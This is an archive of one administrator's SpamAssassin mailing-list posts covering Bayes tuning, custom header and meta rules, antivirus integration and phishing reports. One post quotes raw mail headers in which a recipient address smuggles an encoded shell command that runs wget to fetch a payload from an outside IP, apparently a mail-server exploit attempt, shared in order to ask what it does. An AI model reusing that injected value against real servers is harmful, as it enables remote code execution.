Re: Strange findings debugging bayes results

2023-02-16 Thread Dave Wreski

Hi,

Here's also another 50+ headers we've collected over the years that I 
believe started as a list from AXB 10+ years ago.


https://pastebin.com/raw/f6Fwh8HJ

dave

On 2/16/23 6:02 AM, Henrik K wrote:

On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote:

I was investigating a bunch of bitcoin spam: different titles,
different senders (all from gmail), different text, different pdf
attachment.

Unfortunately in those days my bayes db was polluted and they all got
a BAYES_50, 0.8.

I tested the messages now with a recreated bayes db and got some
BAYES_999. So I dug to understand if I already saw the spam...

But the debug result was unpleasant:
dbg: bayes: tokenized header: 92 tokens
dbg: bayes: token 'HX-Received:Jan' => 0.998028449502134
dbg: bayes: token 'HX-Google-DKIM-Signature:20210112' => 0.997244532803181
dbg: bayes: token 'H*r:sk:' =>
0.997244532803181
dbg: bayes: token 'H*r:a05' => 0.995425742574258
dbg: bayes: token 'HAuthentication-Results:sk:.' =>
0.986543689320388
dbg: bayes: token 'HX-Google-DKIM-Signature:reply-to' => 0.916110175863517
dbg: bayes: token 'H*r:2002' => 0.877842810325844
dbg: bayes: token 'HAuthentication-Results:2048-bit' => 0.858520043212023
dbg: bayes: token 'HAuthentication-Results:pass' => 0.855193895034317
dbg: bayes: score = 0.97915091326


Every score is based on headers, very generic headers. and some
related to my setup.

Not a single token from the message body

The Bayes implementation has been practically unmaintained for a long time,
so YMMV.

You can try something like this, most headers are parsed badly and generate
biasing random garbage (unscientific observation):

bayes_ignore_header ARC-Authentication-Results
bayes_ignore_header ARC-Message-Signature
bayes_ignore_header ARC-Seal
bayes_ignore_header Authentication-Results
bayes_ignore_header Autocrypt
bayes_ignore_header IronPort-SDR
bayes_ignore_header suggested_attachment_session_id
bayes_ignore_header X-Brightmail-Tracker
bayes_ignore_header X-Exchange-Antispam-Report-CFA-Test
bayes_ignore_header X-Forefront-Antispam-Report
bayes_ignore_header X-Forefront-Antispam-Report-Untrusted
bayes_ignore_header X-Gm-Message-State
bayes_ignore_header X-Google-DKIM-Signature
bayes_ignore_header x-microsoft-antispam
bayes_ignore_header X-Microsoft-Antispam-Message-Info
bayes_ignore_header X-Microsoft-Antispam-Message-Info-Original
bayes_ignore_header X-Microsoft-Antispam-Untrusted
bayes_ignore_header X-Microsoft-Exchange-Diagnostics
bayes_ignore_header x-ms-exchange-antispam-messagedata
bayes_ignore_header x-ms-exchange-antispam-messagedata-0
bayes_ignore_header x-ms-exchange-crosstenant-id
bayes_ignore_header x-ms-exchange-crosstenant-network-message-id
bayes_ignore_header x-ms-exchange-crosstenant-rms-persistedconsumerorg
bayes_ignore_header X-MS-Exchange-CrossTenant-userprincipalname
bayes_ignore_header x-ms-exchange-slblob-mailprops
bayes_ignore_header x-ms-office365-filtering-correlation-id
bayes_ignore_header X-MSFBL
bayes_ignore_header X-Provags-ID
bayes_ignore_header X-SG-EID
bayes_ignore_header X-SG-ID
bayes_ignore_header X-UI-Out-Filterresults
bayes_ignore_header X-ClientProxiedBy
bayes_ignore_header X-MS-Exchange-CrossTenant-FromEntityHeader
bayes_ignore_header X-OriginatorOrg
bayes_ignore_header X-MS-Exchange-CrossTenant-OriginalArrivalTime
bayes_ignore_header X-MS-TrafficTypeDiagnostic
bayes_ignore_header X-MS-Exchange-CrossTenant-AuthAs
bayes_ignore_header X-MS-Exchange-Transport-CrossTenantHeadersStamped
bayes_ignore_header X-MS-Exchange-CrossTenant-AuthSource

--


 DaveWreski

President & CEO

Guardian Digital, Inc.

We Make Email Safe








640-800-9446 

dwre...@guardiandigital.com 

https://guardiandigital.com 

103 Godwin Ave, Suite 314, Midland Park, NJ 07432




facebook    

twitter  

linkedin    



Intuit servers sending paypal phishes

2022-05-06 Thread Dave Wreski
Hi, Intuit's servers are being used to send Paypal phishing invoices 
combined with the "evil numbers" scam.


https://pastebin.com/iad07S8N

Received: from o4.e.notification.intuit.com 
(o4.e.notification.intuit.com [167.89.82.160])

X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5
tests=[DKIMWL_WL_HIGH=-0.592, DKIM_SIGNED=0.1, DKIM_VALID=-0.1,
DKIM_VALID_AU=-0.1, HTML_MESSAGE=0.001, RCVD_IN_MSPIKE_H2=-0.001,
SPF_HELO_NONE=0.001, SPF_PASS=-0.001, T_REMOTE_IMAGE=0.01,
T_SCC_BODY_TEXT_LINE=-0.01, URIBL_BLOCKED=0.001,
USER_IN_DEF_DKIM_WL=-7.5, USER_IN_DEF_SPF_WL=-7.5]

Authentication-Results: orion.example.com;
dkim=pass (2048-bit key; unprotected) header.d=notification.intuit.com 
header.i=@notification.intuit.com header.a=rsa-sha256 header.s=s1 
header.b=p9xDPEcU


--


 DaveWreski

President & CEO

Guardian Digital, Inc.

We Make Email Safe






640-800-9446 

dwre...@guardiandigital.com 

https://guardiandigital.com 

103 Godwin Ave, Suite 314, Midland Park, NJ 07432



facebook    
twitter  
linkedin    



Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski



That's a great call, thanks. I grepped my mail files and didn't find 
any SPAM_99 headers in any of them.


You should be looking for BAYES_99 and BAYES_999 in your corpus.



Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox 
/home/thomas.cameron/mail/INBOX/[mailbox file] and then sa-learn --spam 
--mbox /home/thomas.cameron/mail/INBOX/spam) to train SA, doesn't that 
mean that I've already checked my corpora?


No, that's how you train your corpora. If you manually look through the 
headers of mail that's already been processed by your mail system, the 
ham should be as close to BAYES_00 as possible, and spam should be at 
BAYES_99. If that's not the case, then it's been trained incorrectly.


/etc/mail/spamassassin/local.cf:
bayes_auto_learn  0
bayes_auto_expire 0

I'd also recommend disabling auto-learn, if you have that enabled.

If you've gone through your corpus manually, and are certain the ham is 
all good mail and the spam emails are all bad mail, then it might be 
worth it to dump the existing bayes database and just retrain it with 
the corresponding mboxes.


I also typically add --progress to sa-learn.

Best,
Dave





Thomas


Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski




You should probably check that none of your ham (i.e. non-spam)
messages contains SPAM_99 or SPAM_999. It can happen when spammers
poison your bayes database, and increased score in that case might
lead to legitimate mail being misclassified as a spam.


That's a great call, thanks. I grepped my mail files and didn't find any 
SPAM_99 headers in any of them.


You should be looking for BAYES_99 and BAYES_999 in your corpus.

Best,
Dave




Re: Seeing "check: exceeded time limit in ..." and need to resolve it

2021-11-16 Thread Dave Wreski




For that matter how many know about 'apropos'? And, even if they do,
they may not discover 'locate' because 'apropos search' doesn't find
either 'updatedb' or 'locate'. You have to enter 'apropos find' to
discover that 'locate' exists, and even then you could get side tracked
into trying to use the much more complex 'find' utility.


Or the old-school rpm:

$ rpm -ql spamassassin|grep TxRep
/usr/share/man/man3/Mail::SpamAssassin::Plugin::TxRep.3pm.gz
/usr/share/perl5/vendor_perl/Mail/SpamAssassin/Plugin/TxRep.pm

Dave



Martin



Re: More fake order spam

2021-04-27 Thread Dave Wreski




Invalid List-ID. You can then use that with other weirdness in a meta.
header    __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ 
/<([\w-]+)(\.[\w-]+)+>/
meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && 
!__LIST_ID_DOMAIN_IN_BRACKETS

score  LIST_ID_IMPROPER_FORMAT 0.001
describe LIST_ID_IMPROPER_FORMAT List-id has improper format


You lost me here. The spam has this:

List-Id: MzY3NDAxMi01Nzg2LTU= 

That's not legit? It's in brackets.


It's matching on the text before the brackets.


I meant to say that it's not matching the __LIST_ID_DOMAIN_IN_BRACKETS 
because of the text before the brackets, so the rule matches/triggered.


Regards,
Dave


Re: More fake order spam

2021-04-27 Thread Dave Wreski

Hi,


Investigate adding the SEM_FRESH rules - this domain was created less
than five days ago.
https://spameatingmonkey.com/services


OK, how do I get those rules installed? I've only installed KAM rules 
using a channel. I don't see anything similar for SEM rules. I see the 
page you linked to says to drop this into the config:


# SEM-FRESH
urirhssub SEM_FRESH fresh.spameatingmonkey.net. A 2
body SEM_FRESH eval:check_uridnsbl('SEM_FRESH')
describe SEM_FRESH Contains a domain registered less than 5 days ago
tflags SEM_FRESH net
score SEM_FRESH 0.5


Just copy them to a file ending in ".cf" in your local spamassassin 
rules directory like you did with the rule you created below.


I've never seen anything like this before. Looks like this is the 
documentation for that: 
https://spamassassin.apache.org/full/3.2.x/doc/Mail_SpamAssassin_Plugin_URIDNSBL.html 


That's instructions for enabling the URIDNSBL, which is probably already 
enabled.


Check for something like this in your init.pre file
loadplugin Mail::SpamAssassin::Plugin::URIDNSBL


Invalid List-ID. You can then use that with other weirdness in a meta.
header    __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/
meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && 
!__LIST_ID_DOMAIN_IN_BRACKETS

score  LIST_ID_IMPROPER_FORMAT 0.001
describe LIST_ID_IMPROPER_FORMAT List-id has improper format


You lost me here. The spam has this:

List-Id: MzY3NDAxMi01Nzg2LTU= 

That's not legit? It's in brackets.


It's matching on the text before the brackets.


I believe the new Esp module that works to identify bad sendgrid
accounts also has support for sendinblue accounts, but to what extent?
X-Mailer: Sendinblue


To start, I wrote this rule that I think will probably work well because 
it doesn't make sense for any order information is going to come from a 
mailing list.


# fake order spam
header    __LOCAL_FAKE_ORDER_SUBJ   Subject =~ /your.order/i
header    __LOCAL_FAKE_ORDER_1   X-Mailer =~ /Sendinblue/i
header    __LOCAL_FAKE_ORDER_2   List-Id =~ /./

meta  LOCAL_FAKE_ORDER  _LOCAL_FAKE_ORDER_SUBJ + (__LOCAL_FAKE_ORDER_2 + 
__LOCAL_FAKE_ORDER_3 >= 1)

score LOCAL_FAKE_ORDER 3.0


That's great, but probably doesn't have much longevity.

You can also use the following for the presence of a header:
header  __LOCAL_FAKE_ORDER_2exists:List-Id

Regards,
Dave


Re: More fake order spam

2021-04-27 Thread Dave Wreski




-2.5 RCVD_IN_HOSTKARMA_W    RBL: Sender listed in HOSTKARMA-WHITE
  [185.41.28.7 listed in 
hostkarma.junkemailfilter.com]


We've reduced this score to -1 locally.


-1.0 BAYES_00   BODY: Bayes spam probability is 0 to 1%


Needs to be trained, obviously. Bayes is best for this body content.

Looks like it's coming from some kind of bulk mail service which is 
whitelisted. Even after training with bayes, it will still be a false 
negative.


Any ideas on the best way to tackle these kinds of fake order spam?


Investigate adding the SEM_FRESH rules - this domain was created less 
than five days ago.

https://spameatingmonkey.com/services

Invalid List-ID. You can then use that with other weirdness in a meta.
header__LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/
meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && 
!__LIST_ID_DOMAIN_IN_BRACKETS

score  LIST_ID_IMPROPER_FORMAT 0.001
describe LIST_ID_IMPROPER_FORMAT List-id has improper format

Investigate configuring dcc. We also created a meta that matches DCC and 
URIBLs.


I believe the new Esp module that works to identify bad sendgrid 
accounts also has support for sendinblue accounts, but to what extent?

X-Mailer: Sendinblue

I believe later versions of SA also have more geolocation support - do 
you have a need to receive mail from France?

$ whois 185.41.28.7
...
route:  185.41.28.0/22
descr:  SENDINBLUE-185-41-28-0-22
origin: AS200484

Regards,
Dave






Re: Spoofed amazon order email

2021-04-16 Thread Dave Wreski

Hi Steve,

As Antony just reported, post these spamples to something like 
pastebin.com then provide a link so we can view the raw email.


X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on 


This is the first issue I see - you're likely missing a lot of 
additional features of later versions, as well as regular updates.



From: "or...@amazon.com" 


I believe this mismatch would also be caught with later versions.


-0.0 BAYES_20   BODY: Bayes spam probability is 5 to 20%


This is the other big issue - you need to train these to recognize this 
as spam/phishing. You can also go through your quarantine to find spam 
that hasn't been properly trained to use as a corpus.


And how the hell is google letting this crap flow out of its email 
service, anyway?


Because they're in the email business, not the email security business.

Go here and make sure you're using the KAM channel (as well as the 
regular sa-updates channel).

https://mcgrail.com/template/kam.cf_channel

Best,
Dave


Re: ANN: ReturnPath rule renaming

2021-03-26 Thread Dave Wreski

Hi,


   RCVD_IN_RP_CERTIFIED -> RCVD_IN_VALIDITY_CERTIFIED
   RCVD_IN_RP_SAFE -> RCVD_IN_VALIDITY_SAFE
   RCVD_IN_RP_RNBL -> RCVD_IN_VALIDITY_RPBL

Please audit your local config for score overrides and meta rules 
depending on the old names.


I don't see that the VALIDITY rules exist yet. Will they be in tonight's 
update?


How do you recommend we manage the period where the old rules with our 
meta rules are not invalidated with the publishing of the new rules?


We could duplicate our rules with the old and new, but just wanted to 
see if there was a plan already for dealing with this.


dave


Re: apache.org is blacklisted

2021-01-27 Thread Dave Wreski




On 1/27/21 7:40 AM, Matus UHLAR - fantomas wrote:

On Wed, 27 Jan 2021, Benny Pedersen wrote:

http://multirbl.valli.org/lookup/2a01%3A4f9%3Ac010%3A567c%3A%3A1.html

i dont know how to handle this :=)


On 26.01.21 17:43, John Hardin wrote:

Only one lists it:

  https://matrix.spfbl.net/en/3.227.148.255

  https://matrix.spfbl.net/en/2a01:4f9:c010:567c:0:0:0:1

SPFBL?


while we're here, was anyone able to get their page in english language?

https://spfbl.net/en/project/


It looks like the Google Translate works pretty well for this.

http://itools.com/tool/google-translate-web-page-translator
https://translate.google.com/translate?hl=en=auto=en=https%3A%2F%2Fspfbl.net%2Fen%2Fproject%2F

Regards,
Dave


Re: Emotet today..

2021-01-13 Thread Dave Wreski
Pedro, do you see sigs for it yet? We're seeing a ton of 
Doc.Dropper.EmotetRed1220-9816007-0.


Have you submitted a sample to Steve at Sanesecurity and clamav?

Best,
Dave

On 1/13/21 10:39 AM, Pedro David Marco wrote:

Hi all...

sorry for the semi off-topic...

Today Emotet is being sent in an encrypted zip with the password 
embedded into an anti-ocr image..


watch out!

-
Pedrete


Re: Scoring Based on IP Address

2020-12-17 Thread Dave Wreski

Hi,

On 12/17/20 6:05 PM, Matt wrote:

Is there a way with spamassassin local.conf to add a higher score
based on source ip address or subnet?  Basically the last IP in
"Received:" header.

bad_subnet_add_20_points: 192.168.240.0/24

Raising the score if that IP appeared anywhere in headers or body
might work too.


Yes, but if you're effectively going to create a "poison pill" rule 
where any mail from a particular network is quarantined, you might be 
better of doing this at the firewall or in postfix directly and just 
rejecting it outright.


header __BAD_IP_RCVD  Received  =~ /192\.168\.240\.\d{1,3}/
body   __BAD_IP_BODY /192\.168\.240\.\d{1,3}/
rawbody __BAD_IP_RAWBODY /192\.168\.240\.\d{1,3}/
meta MY_BAD_SENDER __BAD_IP_RCVD || __BAD_IP_BODY || __BAD_IP_RAWBODY
score MY_BAD_SENDER 20
describe MY_BAD_SENDER Contains bad IP

Regards,
Dave



Re: adding AV scanning to working Postfix/SA system

2020-11-30 Thread Dave Wreski




On 11/30/20 7:00 PM, Joe Acquisto-j4 wrote:


On 11/24/20 12:40 PM, Axb wrote:

Fuglu supports Sophos AV
See fuglu.org


Sophos recently discontinued their support for SAVI on Linux. They now
only support "Server Central Intercept X Advanced" which is an entirely
different product.

I would also be interested in newer/supported AV alternatives.

Regards,
Dave



Where did you hear this?  I was just informed it will continue until 2023 at 
least.

The "Free" version is no longer available, apparently, but the "endpoint" 
product is still there
for paying customers.


Directly from my contact there - it was labeled end-of-sale this past 
July. It has an end-of-life date of July 2023. Support will continue to 
support that solution until then, but they will no longer offer new 
subscriptions to customers.


Regards,
Dave



joe a.

-
j4computers, llc
Stone Ridge, NY 12484
 845-687-3734
www.j4computers.com
-



Re: adding AV scanning to working Postfix/SA system

2020-11-24 Thread Dave Wreski




On 11/24/20 12:40 PM, Axb wrote:

Fuglu supports Sophos AV
See fuglu.org


Sophos recently discontinued their support for SAVI on Linux. They now 
only support "Server Central Intercept X Advanced" which is an entirely 
different product.


I would also be interested in newer/supported AV alternatives.

Regards,
Dave



On 11/23/20 5:37 PM, Joe Acquisto-j4 wrote:
So, beyond "experiences" any leads on generic "how to" guides that 
actually work in
practice?   I've found a few, rather than chase geese, I'm sure some 
here have done

similar things, even if with other AV scanners.

SOHO system, on virtual machines.   Fairly recent versions. Running 
openSUSE

Leap 15.1.

Due to some recent malware (obvious stuff) wanted to add AV 
scanning.   I

gather "Amavis-new" is the hot ticket these days,

I deal with Sophos products and would like to use their linux product 
to do

the scanning.   Seems to be precious little on how to do that.

Any experiences?





-
    j4computers, llc
    Stone Ridge, NY 12484
 845-687-3734
    www.j4computers.com
-



Re: to: header is not in my domain

2020-10-20 Thread Dave Wreski

Thanks for quick reply, but blacklist what?
The problem is I do not know this spammy domains.
I want to give a score when To: field is NOT in anyaddr...@mydomain.com 


If only it were that easy.

You'll notice that recipients of this mailing list receive mail to the 
mailing list address, not to each recipient.


You might have better luck building a meta rule that combines the "To:" 
field with something else, like a body rule or lack of presence of an 
SPF record, etc.


You might also consider building rules based on email !__MYDOMAIN, and 
excluding cases like this mailing list, then otherwise adding points 
that would normally be overcome by a proper SPF record or Envelope From 
address, for example.


You should submit a few of these emails to pastebin.com where we can 
analyze them more thoroughly for other patterns.


Regards,
Dave




cheers
Miki


wt., 20 paź 2020 o 20:25 Benny Pedersen mailto:m...@junc.eu>> 
napisał(a):


Miki skrev den 2020-10-20 21:19:
 > Let's say my domain is mydomain.com  [2].
99% of all the e-mails have:
 > To: m...@mydomain.com 
 > But some e-mails, most likely sent using BCC are coming with:
 > To: anyu...@anydomain.com 
 >
 > Nearly all of them are spam.

blacklist_to then

set blacklist_from to same

this is forged protecting safe

and yes its not fool proff since bcc can be used on remote



Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

2020-07-10 Thread Dave Wreski




On 7/10/20 8:07 AM, Pedro David Marco wrote:
 >On Friday, July 10, 2020, 10:10:20 AM GMT+2, Axb  
wrote:



 >so glad to read this... confirms my picture of you.

 >now back my pet project: rewrite Tom Sawyer

OK... who starts??? :-)

once Finished we can rewrite "El Quixote" as well...


Perhaps if we were still calling black people Injun Joe, people were 
advocating for burning all previous copies, and scouring the Internet 
for all previous occurrences of SpamAssassin and deleting them, you 
might have a point.


Even Mark Twain by 1876 was becoming increasingly embarrassed by his 
failure to question the racist status quo of the world in which he had 
grown up.


Regards,
Dave







--
Pedro


Coronavirus domains

2020-03-17 Thread Dave Wreski

Hi all,

Malwarepatrol has just released a list of 13,000+ domains related to 
coronavirus scams:


https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt
https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.zip

Anyone else have any rules or changes relating to protecting users from 
coronavirus they'd like to share?


dave


SpamAssassin 18th anniversary article

2019-10-24 Thread Dave Wreski

Hi all,

LinuxSecurity just posted an article on the history of SpamAssassin and 
its recent 18th anniversary, some of the new features coming in v4, and 
speaks with some of the lead developers.


https://linuxsecurity.com/features/features/an-open-source-success-story-apache-spamassassin-celebrates-18-years-of-effectively-combating-spam-email

We'd love to know what you think.

Thanks,
Dave


Shell commands in Received and Delivered-To headers

2019-07-11 Thread Dave Wreski

Hi all,

Anyone have a guess on what this is trying to accomplish?

From r...@sab.com  Thu Jul 11 11:05:10 2019
Return-Path: 
X-Original-To: 
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com

Delivered-To: usern...@example.com
Received: by host.example.com (Postfix)
id B58F61206F7; Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
Delivered-To: 
root+${run{x2fbinx2fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com

Received: from sab.com (ns3.nodename.ru [89.104.77.8])
by host.example.com (Postfix) with SMTP id 78E6F120294
	for 
; 
Thu, 11 Jul 2019 11:05:10 -0400 (EDT)


The IPs and host.example.com have been changed, but it's otherwise as 
received. Is it a failed attempt at trying to generate a random string, 
or to exploit some parser?




Re: mysql 8 database problem

2018-12-08 Thread Dave Wreski


On 12/8/18 1:58 PM, Csaba Banhalmi wrote:

Hi,

I upgraded to mysql and since then I can’t use bases db to score my 
mails. Spam assassin -D says the following:


[12254] dbg: bayes: tok_get_all: SQL error: Illegal mix of collations
for operation ' IN '
[12254] dbg: bayes: cannot use bayes on this message; none of the
tokens were found in the database
[12254] dbg: bayes: not scoring message, returning undef

Collation is the same as before, moreover I dumped the db and imported 
in a mysql 5.6 which works fine, I get my bayes scoring just fine.

I use spamassassin 3.4.2 and mysql 8.0.12

Any help is appreciated, thank you!


Have you run mysql_upgrade after upgrading?

I'd also consider changing to mariadb if it's supported by your 
distribution.


Regards,
Dave





Best regards,
Csaba


Re: stackexchange.com in URIBL (false positive?)

2018-07-28 Thread Dave Wreski




   5.7 URIBL_BLACK    Contains an URL listed in the URIBL blacklist
  [URIs: stackexchange.com]

I guess that's not supposed to be like that. I can't change anything at 
it, just for information for somebody in the position to fix that.


It is indeed listed, and listed for a reason.

The default score for URIBL_BLACK is 1.7 with bayes. Why have you 
changed it?


You can request that it be delisted here:

https://admin.uribl.com/

Regards,
Dave


Re: Just to lighten your day?

2018-05-03 Thread Dave Wreski

Hi,

On 05/02/2018 02:21 PM, Joe Acquisto-j4 wrote:

One slipped through, with this subtle sig line (thought it might brighten 
someones day . . . )

"Note: Failure to Verify will lead to final termination of your email account.

Technical Team
Email Administrator
All Right Reversed 2018.(c)"


Being the open source advocates that we are here, I actually thought it 
was a reference to the "copyleft" license.


https://en.wikipedia.org/wiki/All_rights_reversed

Not to be confused with the Chemical Brothers song by the same name, lol.

Best,
Dave


Re: sneaky spams w/zipped URL file, easily caught by "Thread-Index"

2018-03-27 Thread Dave Wreski

Hi,

Excellent... except for one potential problem... this is in their 
"foxhole_all.cdb" file which they label as "high false positive risk" 
- which could scare some away!


For those who don't score very high on ClamAv and/or who are able to 
score DIFFERENTLY based on different types of Sanesecurity and/or 
ClamAv results, this is probably OK. But for others who prefer to 
either outright block or score high on ClamAv, that MIGHT present a 
problem. On the other hand, maybe Sanesecurity is just being overly 
cautious (or considering more theoretical FNs?), and such actual FPs 
in real world mail flow are actually extremely rare?


Any Thoughts? Anyone know?



That's interesting because I probably wouldn't have started using 
foxhole_all.cdb if it had been classified like that then.  I am not 
getting any reports or finding any problems with FPs.


foxhole_all is just a few dozen(?) lines of rules to tag file types 
within zip/rar/7z/arj/exe files.


Perhaps because you're outright rejecting many of these file types already?

Regards,
Dave



3,110,729 total messages* since March 15th
112,477 spam blocked
2,071 total viruses found
8 Foxhole viruses found

*After MTA rejects based on RBLs and other DNS checks

--
Dave Jones


***UNCHECKED*** Can't locate object method "trim_domain"

2018-01-26 Thread Dave Wreski

Hi, while learning an mbox on a recent 3.4.2 svn:

# sa-learn --spam --progress --mbox junk-012618
 28% [== 
   ] 
5.53 msgs/sec 00m44s LEFTUse of uninitialized value in lc at 
/usr/share/perl5/vendor_perl/Mail/SpamAssassin/RegistryBoundaries.pm 
line 205.
plugin: eval failed: Can't locate object method "trim_domain" via 
package "elo...@netvisio.com" (perhaps you forgot to load 
"elo...@netvisio.com"?) at 
/usr/share/perl5/vendor_perl/Mail/SpamAssassin/RegistryBoundaries.pm 
line 230.
 97% 
[= 
   ]   1.71 msgs/sec 01m34s DONE

Learned tokens from 162 message(s) (162 message(s) examined)

   227# keep IPs intact
   228if ($uri !~ /^\d+\.\d+\.\d+\.\d+$/) {
   229  # get rid of hostname part of domain, understanding delegation
   230  $uri = $self->trim_domain($uri);
   231
   232  # ignore invalid domains
   233  return unless ($self->is_domain_valid($uri));
   234}

I've searched through bugzilla and haven't found anything similar. Is 
this a known issue? I can provide the message that produced this error 
off-list if necessary.






Re: SA-Update not updating DB

2017-11-17 Thread Dave Wreski



On 11/17/2017 11:39 AM, Jari Fredriksson wrote:




David Jones  kirjoitti 16.11.2017 kello 15.22:

REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install ${REV}.tar.gz


+1 for sunday. I installed this now to my farm and will keep and eye on it thru 
weekend.


+1 for Sunday here too. We've installed it all around and doing great so 
far. Thanks everyone for the amazing work.


Thanks,
Dave


Re: SA-Update not updating DB

2017-11-16 Thread Dave Wreski



REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install ${REV}.tar.gz

(reload/restart whatever is calling SA -- spamd, amavis-new,
mimedefang,
MailScanner, etc.)

I have applied this ruleset to my platforms and will monitor
scoring/blocking over the next couple of days.


Hmm, the file doesn't seem to be able to be found unless of course I
did something incorrectly:

chris@localhost:~/Downloads$ wget http://sa-update.ena.com/${REV}.tar.g
z
--2017-11-16 08:51:50--  http://sa-update.ena.com/.tar.gz
Resolving sa-update.ena.com (sa-update.ena.com)... 96.4.1.5, 96.5.1.5
Connecting to sa-update.ena.com (sa-update.ena.com)|96.4.1.5|:80...
connected.
HTTP request sent, awaiting response... 404 Not Found
2017-11-16 08:51:50 ERROR 404: Not Found.


You forgot to set the REV environment variable first. Just copy the text 
including the REV=1815298 and paste on the command-line as root and it 
should work.


Regards,
Dave






Re: Problem with massive log files

2017-04-04 Thread Dave Wreski

Hi,



I've posted the spamfilter.sh file to http://pasted.co/7b794ccd

I don't see anything in there about verbose logging, but there are
two lines in there with a resemblance to your suggestion:

logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping to
SpamAssassin: $SPAMASSASSIN -x -E -s $MAX_MESSAGE_SIZE"

and

logger -s -p mail.notice -t spamfilter <<<"OK.  Piping to sendmail:
$SENDMAIL $@"

The second one seems to be after-the-fact, so I think I could modify
the first one.  Should this be cut down to:

$SPAMASSASSIN -x -E -s $MAX_MESSAGE_SIZE

to avoid the logging process?


Yes, you can comment out this line:

logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping ...

and this one:

logger -s -p mail.notice -t spamfilter <<<"OK.  Piping to sendmail: ...

Basically, the first and last "logger" lines. That's a good start.

Regards,
Dave


Re: Problem with massive log files

2017-04-04 Thread Dave Wreski

Hi,


I thought spamfilter was spamassassin.

Looking through my config files, the postfix master.cf file contains
the line:

flags=Rq user=spamd argv=/usr/bin/spamfilter.sh -oi -f ${sender}
${recipient}

/usr/bin/spamfilter.sh is described in the comments as:


Where did you get the instructions to put this whole system together? 
You mentioned amavisd-new, but this doesn't look to be using amavisd-new 
at all.


Look through the script for something relating to "debug" or "verbose" 
or "info:" or something pertaining to logging and disable it.


In fact, a little googling shows this:

logger <<<"Spam filter piping to SpamAssassin, then to: $SENDMAIL $@"
  ${SPAMASSASSIN} | ${SENDMAIL} "$@"

You should be able to comment that out and instead use the following in 
place:


${SENDMAIL} "$@"


Current log file is up to 165 Gb.


You should look at your logging and/or log rotating system to get this 
under control. I believe that's going to be /etc/logrotate.d/


Regards,
Dave




Kind regards.

Jim.



On 04/04/17 22:41, Dave Wreski wrote:

Hi,


My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV,
Amavis-new and Dovecot.


What is "spamfilter"?

Apr  2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208]
info: spamd:
connection from ip6-localhost [::1]:53930 to port 783, fd 5

What operating system?

Regards,
Dave




Re: Problem with massive log files

2017-04-04 Thread Dave Wreski

Hi,


My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV,
Amavis-new and Dovecot.


What is "spamfilter"?

Apr  2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208] info: 
spamd: connection from ip6-localhost [::1]:53930 to port 783, fd 5


What operating system?

Regards,
Dave



Re: Define new variables in local.cf

2016-11-08 Thread Dave Wreski

Hi,


having the regex into a variable would help maintenance. Something like:

$BankList = "Bank1|Bank2|Bank3|Bank4"

uri   BANKURI  /$BankList/i
score   BANKURI0.2

body   BANKBODY /$BankList/i
score   BANKBODY0.1

is there any way to do this?


You might try something like this:

body__BANK1 /Bank1/
body__BANK2 /Bank2/
body__BANK3 /Bank3/
metaBANKBODY(__BANK1 || __BANK2 || __BANK3 >= 1)
score   BANKBODY0.1

uri __BANKURI1  /bank1\.com/
uri __BANKURI2  /bank2\.com/
uri __BANKURI3  /bank3\.com/
metaBANKURI (__BANKURI1 || __BANKURI2 || __BANKURI3 >= 1)
score   BANKURI 0.1

If you'd like to be able to use variables, like $BankList, I would 
create a script that writes out the spamassassin cf file to the 
spamassassin rule directory.


Regards,
Dave


Re: ClamAV.pm Plugin Not Working

2015-11-20 Thread Dave Wreski



clamdscan -c /etc/clamd.d/scan.conf eicar.txt
/home/dan/eicar.txt: lstat() failed: Permission denied. ERROR


It looks to be related to clamdscan performing a chroot() and the files 
you're referencing not being available from within that chroot. Try 
passing the --stream option.


-bash-4.3$ clamdscan /var/tmp/orderlist.exe
/var/tmp/orderlist.exe: lstat() failed: No such file or directory. ERROR

--- SCAN SUMMARY ---
Infected files: 0
Total errors: 1
Time: 0.000 sec (0 m 0 s)
-bash-4.3$ clamdscan /var/tmp/orderlist.exe --stream
/var/tmp/orderlist.exe: PUA.Win32.Packer.SetupExeSection FOUND

--- SCAN SUMMARY ---
Infected files: 1
Time: 0.051 sec (0 m 0 s)
-bash-4.3$ clamdscan /var/tmp/orderlist.exe --fdpass
/var/tmp/orderlist.exe: PUA.Win32.Packer.SetupExeSection FOUND

--- SCAN SUMMARY ---
Infected files: 1
Time: 0.042 sec (0 m 0 s)

Regards,
Dave


Re: SPF and blocking phishing attempts

2015-10-14 Thread Dave Wreski

Hi,

On 10/14/2015 06:08 PM, Dianne Skoll wrote:

On Wed, 14 Oct 2015 17:51:23 -0400
Alex  wrote:


